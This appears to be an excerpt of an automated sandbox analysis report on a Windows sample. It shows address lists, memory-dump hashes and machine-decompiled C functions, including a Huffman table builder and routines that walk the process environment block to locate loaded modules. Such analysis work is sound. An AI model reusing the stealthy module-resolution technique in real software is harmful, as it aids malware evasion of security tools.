                                                                                0x00000000
                                                                                0x00406dc7
                                                                                0x00406dc7
                                                                                0x00406dcb
                                                                                0x00406dce
                                                                                0x00406dd1
                                                                                0x00406dd4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406dda
                                                                                0x00406dda
                                                                                0x00406dff
                                                                                0x00406dff
                                                                                0x00406dff
                                                                                0x00406e01
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ddf
                                                                                0x00406ddf
                                                                                0x00406de3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406de9
                                                                                0x00406de9
                                                                                0x00406dec
                                                                                0x00406def
                                                                                0x00406df2
                                                                                0x00406df4
                                                                                0x00406df6
                                                                                0x00406df9
                                                                                0x00406dfc
                                                                                0x00406dfc
                                                                                0x00406dfc
                                                                                0x00406e03
                                                                                0x00406e03
                                                                                0x00406e0b
                                                                                0x00406e0e
                                                                                0x00406e11
                                                                                0x00406e14
                                                                                0x00406e18
                                                                                0x00406e1b
                                                                                0x00406e1d
                                                                                0x00406e20
                                                                                0x00406e22
                                                                                0x00406e36
                                                                                0x00406e36
                                                                                0x00406e39
                                                                                0x00406e53
                                                                                0x00406e53
                                                                                0x00406e56
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e5c
                                                                                0x00406e5c
                                                                                0x00406e5f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e65
                                                                                0x00406e65
                                                                                0x00000000
                                                                                0x00406e65
                                                                                0x00406e3b
                                                                                0x00406e3e
                                                                                0x00406e45
                                                                                0x00406e48
                                                                                0x00000000
                                                                                0x00406e48
                                                                                0x00406e24
                                                                                0x00406e28
                                                                                0x00406e2b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e70
                                                                                0x00406e70
                                                                                0x00406e95
                                                                                0x00406e95
                                                                                0x00406e95
                                                                                0x00406e97
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e75
                                                                                0x00406e75
                                                                                0x00406e79
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e7f
                                                                                0x00406e7f
                                                                                0x00406e82
                                                                                0x00406e85
                                                                                0x00406e88
                                                                                0x00406e8a
                                                                                0x00406e8c
                                                                                0x00406e8f
                                                                                0x00406e92
                                                                                0x00406e92
                                                                                0x00406e92
                                                                                0x00406e99
                                                                                0x00406ea1
                                                                                0x00406ea4
                                                                                0x00406ea7
                                                                                0x00406ea9
                                                                                0x00406eac
                                                                                0x00406eac
                                                                                0x00406eae
                                                                                0x00406eb2
                                                                                0x00406eb5
                                                                                0x00406eb8
                                                                                0x00406ebb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ec1
                                                                                0x00406ec1
                                                                                0x00406ee6
                                                                                0x00406ee6
                                                                                0x00406ee6
                                                                                0x00406ee8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ec6
                                                                                0x00406ec6
                                                                                0x00406eca
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ed0
                                                                                0x00406ed0
                                                                                0x00406ed3
                                                                                0x00406ed6
                                                                                0x00406ed9
                                                                                0x00406edb
                                                                                0x00406edd
                                                                                0x00406ee0
                                                                                0x00406ee3
                                                                                0x00406ee3
                                                                                0x00406ee3
                                                                                0x00406eea
                                                                                0x00406eea
                                                                                0x00406ef2
                                                                                0x00406ef5
                                                                                0x00406ef8
                                                                                0x00406efb
                                                                                0x00406eff
                                                                                0x00406f02
                                                                                0x00406f04
                                                                                0x00406f07
                                                                                0x00406f0a
                                                                                0x00406f24
                                                                                0x00406f24
                                                                                0x00406f27
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f2d
                                                                                0x00406f2d
                                                                                0x00406f30
                                                                                0x00406f37
                                                                                0x00000000
                                                                                0x00406f37
                                                                                0x00406f0c
                                                                                0x00406f0f
                                                                                0x00406f16
                                                                                0x00406f19
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f3f
                                                                                0x00406f3f
                                                                                0x00406f64
                                                                                0x00406f64
                                                                                0x00406f64
                                                                                0x00406f66
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f44
                                                                                0x00406f44
                                                                                0x00406f48
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f4e
                                                                                0x00406f4e
                                                                                0x00406f51
                                                                                0x00406f54
                                                                                0x00406f57
                                                                                0x00406f59
                                                                                0x00406f5b
                                                                                0x00406f5e
                                                                                0x00406f61
                                                                                0x00406f61
                                                                                0x00406f61
                                                                                0x00406f68
                                                                                0x00406f70
                                                                                0x00406f73
                                                                                0x00406f76
                                                                                0x00406f78
                                                                                0x00406f7b
                                                                                0x00406f7b
                                                                                0x00406f7d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f83
                                                                                0x00406f83
                                                                                0x00406f86
                                                                                0x00406f8b
                                                                                0x00406f8d
                                                                                0x00406f93
                                                                                0x00406f95
                                                                                0x00406faa
                                                                                0x00406fac
                                                                                0x00406fac
                                                                                0x00406f97
                                                                                0x00406f9d
                                                                                0x00406f9f
                                                                                0x00406fa1
                                                                                0x00406fa1
                                                                                0x00406fae
                                                                                0x00406fb2
                                                                                0x00406fb5
                                                                                0x00406fbb
                                                                                0x00406fbb
                                                                                0x00406fbe
                                                                                0x00406fbe
                                                                                0x00406fbe
                                                                                0x00406fc0
                                                                                0x00406a54
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406a54
                                                                                0x004069cf
                                                                                0x004069cf
                                                                                0x004069d5
                                                                                0x004069db
                                                                                0x004069dd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004069df
                                                                                0x004069df
                                                                                0x004069e1
                                                                                0x004069e3
                                                                                0x004069e6
                                                                                0x004069ed
                                                                                0x004069ed
                                                                                0x004069ef
                                                                                0x004069e8
                                                                                0x004069e8
                                                                                0x004069ea
                                                                                0x004069ea
                                                                                0x004069f1
                                                                                0x004069f3
                                                                                0x004069f6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406afa
                                                                                0x00406afd
                                                                                0x00406b00
                                                                                0x00406b06
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406cdd
                                                                                0x00406cdd
                                                                                0x00406cdd
                                                                                0x00406ce0
                                                                                0x00406ce3
                                                                                0x00406ce5
                                                                                0x00406ce8
                                                                                0x00406cee
                                                                                0x00406cf5
                                                                                0x00406cf7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406bcb
                                                                                0x00406bcb
                                                                                0x00406bf3
                                                                                0x00406bf3
                                                                                0x00406bf3
                                                                                0x00406bf5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406bd3
                                                                                0x00406bd3
                                                                                0x00406bd7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406bdd
                                                                                0x00406bdd
                                                                                0x00406be0
                                                                                0x00406be3
                                                                                0x00406be6
                                                                                0x00406be8
                                                                                0x00406bea
                                                                                0x00406bed
                                                                                0x00406bf0
                                                                                0x00406bf0
                                                                                0x00406bf0
                                                                                0x00406bf7
                                                                                0x00406bf7
                                                                                0x00406bff
                                                                                0x00406c02
                                                                                0x00406c08
                                                                                0x00406c0b
                                                                                0x00406c0f
                                                                                0x00406c13
                                                                                0x00406c16
                                                                                0x00406c19
                                                                                0x00406c31
                                                                                0x00406c31
                                                                                0x00406c34
                                                                                0x00406c42
                                                                                0x00406c45
                                                                                0x00406c36
                                                                                0x00406c36
                                                                                0x00406c38
                                                                                0x00406c3f
                                                                                0x00406c3f
                                                                                0x00406c6e
                                                                                0x00406c6e
                                                                                0x00406c6e
                                                                                0x00406c71
                                                                                0x00406c73
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406c4e
                                                                                0x00406c4e
                                                                                0x00406c52
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406c58
                                                                                0x00406c58
                                                                                0x00406c5b
                                                                                0x00406c5e
                                                                                0x00406c61
                                                                                0x00406c63
                                                                                0x00406c65
                                                                                0x00406c68
                                                                                0x00406c6b
                                                                                0x00406c6b
                                                                                0x00406c6b
                                                                                0x00406c75
                                                                                0x00406c75
                                                                                0x00406c77
                                                                                0x00406c79
                                                                                0x00406c84
                                                                                0x00406c87
                                                                                0x00406c8a
                                                                                0x00406c8c
                                                                                0x00406c8e
                                                                                0x00406c90
                                                                                0x00406c93
                                                                                0x00406c96
                                                                                0x00406c9b
                                                                                0x00406c9e
                                                                                0x00406ca1
                                                                                0x00406ca4
                                                                                0x00406cab
                                                                                0x00406cae
                                                                                0x00406cb0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406cb6
                                                                                0x00406cb6
                                                                                0x00406cba
                                                                                0x00406ccb
                                                                                0x00406ccb
                                                                                0x00406ccb
                                                                                0x00406ccd
                                                                                0x00406ccd
                                                                                0x00406cd1
                                                                                0x00406cd1
                                                                                0x00406cd1
                                                                                0x00406cd3
                                                                                0x00406cd4
                                                                                0x00406cd7
                                                                                0x00406cd7
                                                                                0x00406cd7
                                                                                0x00406cda
                                                                                0x00000000
                                                                                0x00406cda
                                                                                0x00406cbc
                                                                                0x00406cbc
                                                                                0x00406cbf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406cc5
                                                                                0x00406cc5
                                                                                0x00000000
                                                                                0x00406cc5
                                                                                0x00406c1b
                                                                                0x00406c1b
                                                                                0x00406c1d
                                                                                0x00406c1f
                                                                                0x00406c22
                                                                                0x00406c25
                                                                                0x00406c29
                                                                                0x00406c29
                                                                                0x00406cfd
                                                                                0x00406cfd
                                                                                0x00406d00
                                                                                0x00406d07
                                                                                0x00406d0b
                                                                                0x00406d0d
                                                                                0x00406d10
                                                                                0x00406d13
                                                                                0x00406d18
                                                                                0x00406d1b
                                                                                0x00406d1d
                                                                                0x00406d1e
                                                                                0x00406d21
                                                                                0x00406d2c
                                                                                0x00406d2f
                                                                                0x00406d46
                                                                                0x00406d4b
                                                                                0x00406d52
                                                                                0x00406d57
                                                                                0x00406d5b
                                                                                0x00406d5d
                                                                                0x00406d5d
                                                                                0x00406d5d
                                                                                0x00406d60
                                                                                0x00406d62
                                                                                0x00000000
                                                                                0x00406d68
                                                                                0x00406d68
                                                                                0x00406d6c
                                                                                0x00406d77
                                                                                0x00406d8a
                                                                                0x00406d8f
                                                                                0x00406d94
                                                                                0x00406d96
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406d9c
                                                                                0x00406d9c
                                                                                0x00406d9f
                                                                                0x00406da1
                                                                                0x00406daf
                                                                                0x00406daf
                                                                                0x00406db2
                                                                                0x00406db2
                                                                                0x00406db5
                                                                                0x00406db8
                                                                                0x00406dbb
                                                                                0x00406dbe
                                                                                0x00406dc1
                                                                                0x00406dc4
                                                                                0x00000000
                                                                                0x00406dc4
                                                                                0x00406da3
                                                                                0x00406da3
                                                                                0x00406da9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406da9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407148
                                                                                0x00407148
                                                                                0x0040714e
                                                                                0x00407154
                                                                                0x00407159
                                                                                0x0040715f
                                                                                0x00407165
                                                                                0x00407167
                                                                                0x0040716a
                                                                                0x00407173
                                                                                0x00407179
                                                                                0x00407179
                                                                                0x0040716c
                                                                                0x0040716e
                                                                                0x00407170
                                                                                0x00407170
                                                                                0x0040717b
                                                                                0x0040717d
                                                                                0x00407180
                                                                                0x004071bb
                                                                                0x004071bb
                                                                                0x00000000
                                                                                0x00407182
                                                                                0x00407182
                                                                                0x00407182
                                                                                0x00407188
                                                                                0x0040718b
                                                                                0x0040718d
                                                                                0x004071c2
                                                                                0x004071c4
                                                                                0x00000000
                                                                                0x004071c4
                                                                                0x00000000
                                                                                0x0040718d
                                                                                0x00000000
                                                                                0x004067cc
                                                                                0x0040719a
                                                                                0x00000000
                                                                                0x0040719a
                                                                                0x00406bae
                                                                                0x00406bb0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406bb2
                                                                                0x00406bb2
                                                                                0x00406bb5
                                                                                0x00000000
                                                                                0x00406bb5
                                                                                0x00406afa
                                                                                0x00406abb
                                                                                0x0040719f
                                                                                0x004071a2
                                                                                0x004071a4
                                                                                0x004071ad
                                                                                0x004071b3
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                • Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
                                                                                • Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                • Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                				signed int _v8;
                                                                                				unsigned int _v12;
                                                                                				signed int _v16;
                                                                                				intOrPtr _v20;
                                                                                				signed int _v24;
                                                                                				signed int _v28;
                                                                                				intOrPtr* _v32;
                                                                                				signed int* _v36;
                                                                                				signed int _v40;
                                                                                				signed int _v44;
                                                                                				intOrPtr _v48;
                                                                                				intOrPtr _v52;
                                                                                				void _v116;
                                                                                				signed int _v176;
                                                                                				signed int _v180;
                                                                                				signed int _v240;
                                                                                				signed int _t166;
                                                                                				signed int _t168;
                                                                                				intOrPtr _t175;
                                                                                				signed int _t181;
                                                                                				void* _t182;
                                                                                				intOrPtr _t183;
                                                                                				signed int* _t184;
                                                                                				signed int _t186;
                                                                                				signed int _t187;
                                                                                				signed int* _t189;
                                                                                				signed int _t190;
                                                                                				intOrPtr* _t191;
                                                                                				intOrPtr _t192;
                                                                                				signed int _t193;
                                                                                				signed int _t195;
                                                                                				signed int _t200;
                                                                                				signed int _t205;
                                                                                				void* _t207;
                                                                                				short _t208;
                                                                                				signed char _t222;
                                                                                				signed int _t224;
                                                                                				signed int _t225;
                                                                                				signed int* _t232;
                                                                                				signed int _t233;
                                                                                				signed int _t234;
                                                                                				void* _t235;
                                                                                				signed int _t236;
                                                                                				signed int _t244;
                                                                                				signed int _t246;
                                                                                				signed int _t251;
                                                                                				signed int _t254;
                                                                                				signed int _t256;
                                                                                				signed int _t259;
                                                                                				signed int _t262;
                                                                                				void* _t263;
                                                                                				void* _t264;
                                                                                				signed int _t267;
                                                                                				intOrPtr _t269;
                                                                                				intOrPtr _t271;
                                                                                				signed int _t274;
                                                                                				intOrPtr* _t275;
                                                                                				unsigned int _t276;
                                                                                				void* _t277;
                                                                                				signed int _t278;
                                                                                				intOrPtr* _t279;
                                                                                				signed int _t281;
                                                                                				intOrPtr _t282;
                                                                                				intOrPtr _t283;
                                                                                				signed int* _t284;
                                                                                				signed int _t286;
                                                                                				signed int _t287;
                                                                                				signed int _t288;
                                                                                				signed int _t296;
                                                                                				signed int* _t297;
                                                                                				intOrPtr _t298;
                                                                                				void* _t299;
                                                                                
                                                                                				_t278 = _a8;
                                                                                				_t187 = 0x10;
                                                                                				memset( &_v116, 0, _t187 << 2);
                                                                                				_t189 = _a4;
                                                                                				_t233 = _t278;
                                                                                				do {
                                                                                					_t166 =  *_t189;
                                                                                					_t189 =  &(_t189[1]);
                                                                                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                					_t233 = _t233 - 1;
                                                                                				} while (_t233 != 0);
                                                                                				if(_v116 != _t278) {
                                                                                					_t279 = _a28;
                                                                                					_t267 =  *_t279;
                                                                                					_t190 = 1;
                                                                                					_a28 = _t267;
                                                                                					_t234 = 0xf;
                                                                                					while(1) {
                                                                                						_t168 = 0;
                                                                                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t190 = _t190 + 1;
                                                                                						if(_t190 <= _t234) {
                                                                                							continue;
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					_v8 = _t190;
                                                                                					if(_t267 < _t190) {
                                                                                						_a28 = _t190;
                                                                                					}
                                                                                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                						_t234 = _t234 - 1;
                                                                                						if(_t234 != 0) {
                                                                                							continue;
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					_v28 = _t234;
                                                                                					if(_a28 > _t234) {
                                                                                						_a28 = _t234;
                                                                                					}
                                                                                					 *_t279 = _a28;
                                                                                					_t181 = 1 << _t190;
                                                                                					while(_t190 < _t234) {
                                                                                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                						if(_t182 < 0) {
                                                                                							L64:
                                                                                							return _t168 | 0xffffffff;
                                                                                						}
                                                                                						_t190 = _t190 + 1;
                                                                                						_t181 = _t182 + _t182;
                                                                                					}
                                                                                					_t281 = _t234 << 2;
                                                                                					_t191 = _t299 + _t281 - 0x70;
                                                                                					_t269 =  *_t191;
                                                                                					_t183 = _t181 - _t269;
                                                                                					_v52 = _t183;
                                                                                					if(_t183 < 0) {
                                                                                						goto L64;
                                                                                					}
                                                                                					_v176 = _t168;
                                                                                					 *_t191 = _t269 + _t183;
                                                                                					_t192 = 0;
                                                                                					_t235 = _t234 - 1;
                                                                                					if(_t235 == 0) {
                                                                                						L21:
                                                                                						_t184 = _a4;
                                                                                						_t271 = 0;
                                                                                						do {
                                                                                							_t193 =  *_t184;
                                                                                							_t184 =  &(_t184[1]);
                                                                                							if(_t193 != _t168) {
                                                                                								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                								_t236 =  *_t232;
                                                                                								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
                                                                                								 *_t232 = _t236 + 1;
                                                                                							}
                                                                                							_t271 = _t271 + 1;
                                                                                						} while (_t271 < _a8);
                                                                                						_v16 = _v16 | 0xffffffff;
                                                                                						_v40 = _v40 & 0x00000000;
                                                                                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                						_t195 = _v8;
                                                                                						_t186 =  ~_a28;
                                                                                						_v12 = _t168;
                                                                                						_v180 = _t168;
                                                                                						_v36 = 0x42d6d0;
                                                                                						_v240 = _t168;
                                                                                						if(_t195 > _v28) {
                                                                                							L62:
                                                                                							_t168 = 0;
                                                                                							if(_v52 == 0 || _v28 == 1) {
                                                                                								return _t168;
                                                                                							} else {
                                                                                								goto L64;
                                                                                							}
                                                                                						}
                                                                                						_v44 = _t195 - 1;
                                                                                						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                						do {
                                                                                							_t282 =  *_v32;
                                                                                							if(_t282 == 0) {
                                                                                								goto L61;
                                                                                							}
                                                                                							while(1) {
                                                                                								_t283 = _t282 - 1;
                                                                                								_t200 = _a28 + _t186;
                                                                                								_v48 = _t283;
                                                                                								_v24 = _t200;
                                                                                								if(_v8 <= _t200) {
                                                                                									goto L45;
                                                                                								}
                                                                                								L31:
                                                                                								_v20 = _t283 + 1;
                                                                                								do {
                                                                                									_v16 = _v16 + 1;
                                                                                									_t296 = _v28 - _v24;
                                                                                									if(_t296 > _a28) {
                                                                                										_t296 = _a28;
                                                                                									}
                                                                                									_t222 = _v8 - _v24;
                                                                                									_t254 = 1 << _t222;
                                                                                									if(1 <= _v20) {
                                                                                										L40:
                                                                                										_t256 =  *_a36;
                                                                                										_t168 = 1 << _t222;
                                                                                										_v40 = 1;
                                                                                										_t274 = _t256 + 1;
                                                                                										if(_t274 > 0x5a0) {
                                                                                											goto L64;
                                                                                										}
                                                                                									} else {
                                                                                										_t275 = _v32;
                                                                                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                										if(_t222 >= _t296) {
                                                                                											goto L40;
                                                                                										}
                                                                                										while(1) {
                                                                                											_t222 = _t222 + 1;
                                                                                											if(_t222 >= _t296) {
                                                                                												goto L40;
                                                                                											}
                                                                                											_t275 = _t275 + 4;
                                                                                											_t264 = _t263 + _t263;
                                                                                											_t175 =  *_t275;
                                                                                											if(_t264 <= _t175) {
                                                                                												goto L40;
                                                                                											}
                                                                                											_t263 = _t264 - _t175;
                                                                                										}
                                                                                										goto L40;
                                                                                									}
                                                                                									_t168 = _a32 + _t256 * 4;
                                                                                									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                									 *_a36 = _t274;
                                                                                									_t259 = _v16;
                                                                                									 *_t297 = _t168;
                                                                                									if(_t259 == 0) {
                                                                                										 *_a24 = _t168;
                                                                                									} else {
                                                                                										_t276 = _v12;
                                                                                										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                										_a5 = _a28;
                                                                                										_a4 = _t222;
                                                                                										_t262 = _t276 >> _t186;
                                                                                										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                										 *(_t298 + _t262 * 4) = _a4;
                                                                                									}
                                                                                									_t224 = _v24;
                                                                                									_t186 = _t224;
                                                                                									_t225 = _t224 + _a28;
                                                                                									_v24 = _t225;
                                                                                								} while (_v8 > _t225);
                                                                                								L45:
                                                                                								_t284 = _v36;
                                                                                								_a5 = _v8 - _t186;
                                                                                								if(_t284 < 0x42d6d0 + _a8 * 4) {
                                                                                									_t205 =  *_t284;
                                                                                									if(_t205 >= _a12) {
                                                                                										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                										_v36 =  &(_v36[1]);
                                                                                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                									} else {
                                                                                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                										_t208 =  *_t284;
                                                                                										_v36 =  &(_t284[1]);
                                                                                									}
                                                                                									_a6 = _t208;
                                                                                								} else {
                                                                                									_a4 = 0xc0;
                                                                                								}
                                                                                								_t286 = 1 << _v8 - _t186;
                                                                                								_t244 = _v12 >> _t186;
                                                                                								while(_t244 < _v40) {
                                                                                									 *(_t168 + _t244 * 4) = _a4;
                                                                                									_t244 = _t244 + _t286;
                                                                                								}
                                                                                								_t287 = _v12;
                                                                                								_t246 = 1 << _v44;
                                                                                								while((_t287 & _t246) != 0) {
                                                                                									_t287 = _t287 ^ _t246;
                                                                                									_t246 = _t246 >> 1;
                                                                                								}
                                                                                								_t288 = _t287 ^ _t246;
                                                                                								_v20 = 1;
                                                                                								_v12 = _t288;
                                                                                								_t251 = _v16;
                                                                                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                									L60:
                                                                                									if(_v48 != 0) {
                                                                                										_t282 = _v48;
                                                                                										_t283 = _t282 - 1;
                                                                                										_t200 = _a28 + _t186;
                                                                                										_v48 = _t283;
                                                                                										_v24 = _t200;
                                                                                										if(_v8 <= _t200) {
                                                                                											goto L45;
                                                                                										}
                                                                                										goto L31;
                                                                                									}
                                                                                									break;
                                                                                								} else {
                                                                                									goto L58;
                                                                                								}
                                                                                								do {
                                                                                									L58:
                                                                                									_t186 = _t186 - _a28;
                                                                                									_t251 = _t251 - 1;
                                                                                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                								_v16 = _t251;
                                                                                								goto L60;
                                                                                							}
                                                                                							L61:
                                                                                							_v8 = _v8 + 1;
                                                                                							_v32 = _v32 + 4;
                                                                                							_v44 = _v44 + 1;
                                                                                						} while (_v8 <= _v28);
                                                                                						goto L62;
                                                                                					}
                                                                                					_t277 = 0;
                                                                                					do {
                                                                                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                						_t277 = _t277 + 4;
                                                                                						_t235 = _t235 - 1;
                                                                                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                					} while (_t235 != 0);
                                                                                					goto L21;
                                                                                				}
                                                                                				 *_a24 =  *_a24 & 0x00000000;
                                                                                				 *_a28 =  *_a28 & 0x00000000;
                                                                                				return 0;
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                • Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
                                                                                • Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                • Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E6EEE6E07(void* __eflags, intOrPtr _a4) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				signed int _t35;
                                                                                
                                                                                				_v16 =  *[fs:0x30];
                                                                                				_v12 =  *((intOrPtr*)(_v16 + 0xc));
                                                                                				_v20 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                				_v8 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                				while(E6EEE6D4B(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
                                                                                					_v8 =  *_v8;
                                                                                					if(_v8 != _v20) {
                                                                                						continue;
                                                                                					}
                                                                                					return 0;
                                                                                				}
                                                                                				return  *((intOrPtr*)(_v8 + 0x28));
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                • Instruction ID: 40aa40d670f6bcaf5b3f9c90f1901b0474ee095053f0afc6dbc500cd3a37ea20
                                                                                • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                • Instruction Fuzzy Hash: 03014D78A20209EFCB80DFA8C58099DBBF4FB08720F208495E918E7721D330AE509B40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E6EEE6B57() {
                                                                                
                                                                                				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                                                			}



                                                                                0x6eee6b6e

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
